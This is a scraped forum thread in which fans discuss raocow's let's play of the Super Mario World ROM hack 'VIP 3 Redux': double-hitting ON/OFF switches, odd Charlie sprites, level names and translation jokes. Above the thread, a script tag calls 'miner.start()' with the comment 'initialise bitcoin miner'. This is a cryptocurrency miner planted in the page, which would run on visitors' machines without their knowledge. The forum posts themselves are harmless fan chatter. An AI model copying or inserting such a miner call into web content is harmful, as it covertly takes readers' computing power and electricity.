<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

VIP 3 Redux: FINAL: Grace of Kings

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Zummorr
Bug Catcher
Posts: 356
Joined: 4 years ago

Re: VIP 3 Redux: Grassland March

Postby Zummorr » 3 years ago

TaviTurnip wrote:To be fair to that switch block... I have hit switch blocks and had them "double hit" so many times that I would have just assumed that same thing happened and hit it again anyways :1 The least tricky thing in the world because it basically replicates what switches already sometimes do. It wouldn't be normal to overestimate it and assume it's a graphic swap unless you think you (but fail to) remember it from a past experience.

So raocow tricked himself!
It's kinda subtle about itself honestly. I thought it was just raocow being silly and double hit the block with no ASM. I went back and double checked Racow's old playthrough of VIP 3. He hit the block really square on in that run and it flips back for no reason.

Also the fuzzy guys "fire breath" is them yelling something. I think it's been stated before as to what it is, but I do not recall.

User avatar
Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.
Posts: 1142
Joined: 7 years ago
Location: Repping the 703

Re: VIP 3 Redux: Grassland March

Postby Telamon » 3 years ago

If you've never watched Maru's videos, get the fuck on it!
Image

User avatar
Zephyr_DragonLord
The dragon awakens...!
Posts: 887
Joined: 4 years ago
First name: Zach
Location: Somewhere between dreams and dormancy

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby Zephyr_DragonLord » 3 years ago

I like how raocow says that something is hard, and then aces it within a few minutes. I know it won't last, but it's nice while it's there... I think it's because raocow remembers them all.

Cat videos are considered at some point to be art.... While Mizu didn't get into a crowded art festival, other famous cats have...

User avatar
The Destroyer of Worlds
I am become death
Posts: 1487
Joined: 7 years ago

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby The Destroyer of Worlds » 3 years ago

I forget how I found out this was a reference to Maru. I hope I wasn't just talking out of my ass. Don't think so though. I DO remember researching it.

(also the palace has no text in the original)

Anyone care to check the source of those cat charlies and verify that the jumping sprite isn't broken?
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
raocow
the death of the incredible huge
Posts: 2944
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby raocow » 3 years ago

nah the jumping charlies always looked weird
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Validon98
Goofy Night Sparrow
Posts: 364
Joined: 6 years ago
Pronouns: he/she/they
Location: Somewhere in Gensokyo

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby Validon98 » 3 years ago

I wonder why that one level is called "My Crappy 14th Rewrite". Probably some sort of joke or meme or something. Or the author went through a lot of drafts of the level. Or something.

Also yeah, VIP 3-5 jumping duders have always been that way. Dunno why, they just do.
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV: Shadowbringers (Shadows brought, time for postgame)
Final Fantasy V: Four Job Fiesta (Pure Chaos, no restrictions, Interdimensional Rift, let's do this)
Bloodstained: Ritual of the Night (Hard mode is in fact hard)

Strawberry Bose Partial Translations and Patches!

User avatar
Unaniem
Desperately trying to figure out just what the hell
Posts: 156
Joined: 6 years ago
First name: Tree
Location: Megalovanilla

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby Unaniem » 3 years ago

So I when I started watching this today I was rather confused because I could've sworn Charlies were just regular ol' vanilla Charlies in this hack

I just checked on the second run through rao did of this game and well
Image
What's up with that yo?

Also I always interpreted that the neo-2chan Chuck took on a rastafarian look whenever he jumped for some reason
Image

User avatar
Arctangent
squawky
Posts: 612
Joined: 4 years ago
Pronouns: she/her

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby Arctangent » 3 years ago

I think this might be an updated version of the Wall portion of the hack, as I couldn't sworn back in the Bowling Alley this hack had the perv cats, post-fixing. Which made the football cats kind of mysterious. I imagine they felt the cats were inappropriate, so they removed their dicks, then made a new version that reverted back to Charlies after realizing the cats were lacking personality without dicks, then made another version that retroactively added VIP 4's bunnydogs.

User avatar
jayScribble
FEEL THE FORCE
Posts: 423
Joined: 6 years ago
Pronouns: it, they, that
Location: Over there

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby jayScribble » 3 years ago

raocow went from World 1 to World 5. Again.

Those switches being double triggering is certainly something, even for those two levels.
Image
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

User avatar
Zephyr_DragonLord
The dragon awakens...!
Posts: 887
Joined: 4 years ago
First name: Zach
Location: Somewhere between dreams and dormancy

Re: VIP 3 Redux: A Dip on the Long Island

Postby Zephyr_DragonLord » 3 years ago

Did you go to this world on purpose? I think you wanted to prove your point about the difficulty curve... I thought we'd vote on the levels, in which case I would vote Grass Man.

A monocle AND a cowboy hat... such an imagery makes me smile intensely. Comparing your efforts today and previously, you have more skill now, and should not have too much trouble on making it to a potential life farm....

User avatar
xfix
:)
Posts: 751
Joined: 10 years ago
First name: Konrad Borowski

Re: VIP 3 Redux: A Dip on the Long Island

Postby xfix » 3 years ago

Is it that world with Hare of Inaba level in it?

Oh dear, it's like the most broken level ever (I think I flew over it after restarting the game after collecting Midway Point (as there is no real way to fly after Midway Point)).

User avatar
TaviTurnip
Reach for the top
Abministrator
Posts: 1020
Joined: 9 years ago
First name: Rena
Location: The pinnacle

Re: VIP 3 Redux: A Dip on the Long Island

Postby TaviTurnip » 3 years ago

I am somewhat interested in the conversation in the video comments about throwing your key making Phanto worse, because... I kinda don't agree >.> It's an obvious solution, especially underwater. Also I have realized that I did watch about half the old VIP3 LP, no idea why I didn't finish it, but at least the end of the game will be extra interesting for me D:
Don't bother fighting if you don't intend to win.

User avatar
Validon98
Goofy Night Sparrow
Posts: 364
Joined: 6 years ago
Pronouns: he/she/they
Location: Somewhere in Gensokyo

Re: VIP 3 Redux: A Dip on the Long Island

Postby Validon98 » 3 years ago

Okay, I don't think I know of anything about VIP3 past this point. If I did, then it's a complete blank to me. I see though that there's more of these uh... double hit switches than I thought. I hope they aren't like a standard thing in this game, that'd be silly.
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV: Shadowbringers (Shadows brought, time for postgame)
Final Fantasy V: Four Job Fiesta (Pure Chaos, no restrictions, Interdimensional Rift, let's do this)
Bloodstained: Ritual of the Night (Hard mode is in fact hard)

Strawberry Bose Partial Translations and Patches!

Ometeotl
Posts: 693
Joined: 9 years ago

Re: VIP 3 Redux: A Dip on the Long Island

Postby Ometeotl » 3 years ago

"This game is really bad" - raocow 2016

It only took 3 episodes.

User avatar
xfix
:)
Posts: 751
Joined: 10 years ago
First name: Konrad Borowski

Re: VIP 3 Redux: A Dip on the Long Island

Postby xfix » 3 years ago

Validon98 wrote:I see though that there's more of these uh... double hit switches than I thought. I hope they aren't like a standard thing in this game, that'd be silly.
All ON/OFF switches behave like that in VIP3 (I blame FuSoYa's broken screen scrolling pipes myself, they also break glass blocks (those with a switching power-up in those) in such a way that hitting them pretty much causes you to die). It isn't that big of a deal about ON/OFF switches however, after the first world, I think there are only two levels with ON/OFF switches left, and in both of those, effect of pressing those is immediately obvious.

User avatar
Mata Hari
Posts: 2224
Joined: 10 years ago

Re: VIP 3 Redux: A Dip on the Long Island

Postby Mata Hari » 3 years ago

Just because the Koopalings are Bowser's children doesn't mean they are actually children.

And yes, I know Nintendo now say they're not Bowser's children, but who cares about that. Just like who cares about Paper Mario saying a Boo was once alive, Boos are not actually the spirits of the dead, they are their own species, shut up.

User avatar
Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.
Posts: 1142
Joined: 7 years ago
Location: Repping the 703

Re: VIP 3 Redux: A Dip on the Long Island

Postby Telamon » 3 years ago

Also anything involving Bowser Jr. is just an awful fever dream.
Image

User avatar
The Destroyer of Worlds
I am become death
Posts: 1487
Joined: 7 years ago

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby The Destroyer of Worlds » 3 years ago

Validon98 wrote:I wonder why that one level is called "My Crappy 14th Rewrite". Probably some sort of joke or meme or something. Or the author went through a lot of drafts of the level. Or something.
Not to the best of my knowledge. I remember researching the heck out of this one and it ended up being, well, ROM-Hacker-Community Specific lingo as I recall for rewriting a shitty level. Or something like that. It's been years, so I don't exactly remember - but I do remember researching it rather a lot and it not being immediately obvious. Or something. But I do remember finding it out! It wasn't meme related though, unless I missed something, which is certainly possible.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
morsel/morceau
Posts: 373
Joined: 10 years ago
Location: exotic horse island

Re: VIP 3 Redux: A Dip on the Long Island

Postby morsel/morceau » 3 years ago

There is an easy life farm in this world (it's over on the left side).
era64 wrote: All ON/OFF switches behave like that in VIP3 (I blame FuSoYa's broken screen scrolling pipes myself, they also break glass blocks (those with a switching power-up in those) in such a way that hitting them pretty much causes you to die). It isn't that big of a deal about ON/OFF switches however, after the first world, I think there are only two levels with ON/OFF switches left, and in both of those, effect of pressing those is immediately obvious.
I didn't know if what you said about the glass blocks was true, so I cloned one in the life farm level and when I hit it from below (hitting it with a cape does nothing) this happened:
[attachment=0]Mix3_AAEv1_48_00000.png[/attachment]
. But certainly the on/off blocks aren't broken (there are some ones in the video that behave normally). The ones behaving stangely are custom blocks which change the switch status in the ordinary ways (touch from below, cape spin) and if any sprite touches them, but they are set to act like the default switch. Therefore, if the player hits them, they change the switch status twice (once for the custom block, once for the ordinary one), effectively doing nothing, but when the block bounces it is replaced with the invisible solid block and afterwards by an ordinary on/off switch (as this is what the ordinary switch does) so that hitting it "twice" is necessary (you're actually only hitting two different things once each).
Attachments
Mix3_AAEv1_48_00000.png
Mix3_AAEv1_48_00000.png (5.6 KiB) Viewed 2194 times
dont wanna jihad no more

User avatar
alleightbits
START PLAY!
Posts: 704
Joined: 4 years ago
First name: Brian
Location: United States

Re: VIP 3 Redux: A Dip on the Long Island

Postby alleightbits » 3 years ago

oh man this got serious pretty quickly

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2520
Joined: 8 years ago
Location: Finland

Re: VIP 3 Redux: A Dip on the Long Island

Postby Willhart » 3 years ago

I wonder what was the reason for this game starting early. I remember it was originally meant as an intermission between later non-smw games.

User avatar
Ashan
The world has become a place
Posts: 2157
Joined: 9 years ago
Location: Canada

Re: VIP 3 Redux: A Cabinet in the Meadow

Postby Ashan » 3 years ago

jayScribble wrote:raocow went from World 1 to World 5. Again.
Interesting to hear the old translations for these levels. Pretty different from Horikawa's.

Or perhaps Horikawa never knew Japanese all along, and she just did a fake translation one time as a joke but everybody believed her and gave her sincere thanks for the translations and now she's in too far to back out, and she's stuck pretending she knows Japanese and making up translations.

The secret's out now, I'm onto you, Horikawa. Or should I say Hori-CON-wa?
Image
Image
Image
Image
Image
Image

User avatar
Sebby19
Posts: 2564
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: VIP 3 Redux: A Dip on the Long Island

Postby Sebby19 » 3 years ago

So her JAPAN topic was also a ruse? The whole drama and debate about nuking Hiroshima was also a ruse?!?!?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Mata Hari
Posts: 2224
Joined: 10 years ago

Re: VIP 3 Redux: A Dip on the Long Island

Postby Mata Hari » 3 years ago

I'd be willing to bet any amount of money that there is a trick that raocow missed and the creator of that level would make it look super-easy

User avatar
SAJewers
hi
Posts: 3201
Joined: 7 years ago
Location: Nova Scotia

Re: VIP 3 Redux: A Dip on the Long Island

Postby SAJewers » 3 years ago

Here's the level itself, per the VIP wiki:

Image
ImageImageImageImageImage
Image
ImageImageImageImage


Return to “let's play”

Who is online

Users browsing this forum: No registered users and 12 guests